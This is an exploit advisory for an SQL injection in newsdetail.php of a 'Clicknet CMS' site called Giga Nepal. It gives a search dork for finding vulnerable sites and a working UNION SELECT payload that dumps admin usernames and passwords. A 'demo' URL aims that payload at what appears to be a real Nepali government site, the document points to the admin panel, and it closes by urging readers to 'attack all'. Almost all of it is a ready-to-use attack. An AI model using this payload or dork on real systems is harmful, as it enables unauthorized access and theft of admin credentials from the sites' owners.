Giga Nepal suffers from a remote SQL injection vulnerability in newsdetail.php.
cb0e411ef0e99d5a14f4cf4fb60c811f948f378c9febcbd84f4eb90f3c54ec6b
======================================
Author : Gonzhack
Contact : gonzhack@gmail.com
Homepage : Http://www.indonesiancoder.com
======================================
[ INFORMATION ]
[+] Giga Nepal (newsdetail.php?id=) SQL injection Vulnerability
[+] Dork : "Powered by Clicknet CMS"
======================================
[ Bug ]
/newsdetail.php?id=
[ ExPL0!T ]
http://127.0.0.1/newsdetail.php?id=-2+union+select+1,concat(username,0x3a,password),3,4,5,6+from+mytbladminlogin--
[ D3M0]
http://www.bhaktapur.gov.np/newsdetail.php?id=-2+union+select+1,concat(username,0x3a,password),3,4,5,6+from+mytbladminlogin--
[ Admin Panel ]
http://127.0.0.1/admin/
======================================
[ SHOUT ]
[~] www.indonesiancoder.com ( Let's Attack all MALINGSIAL )
[~] You !!!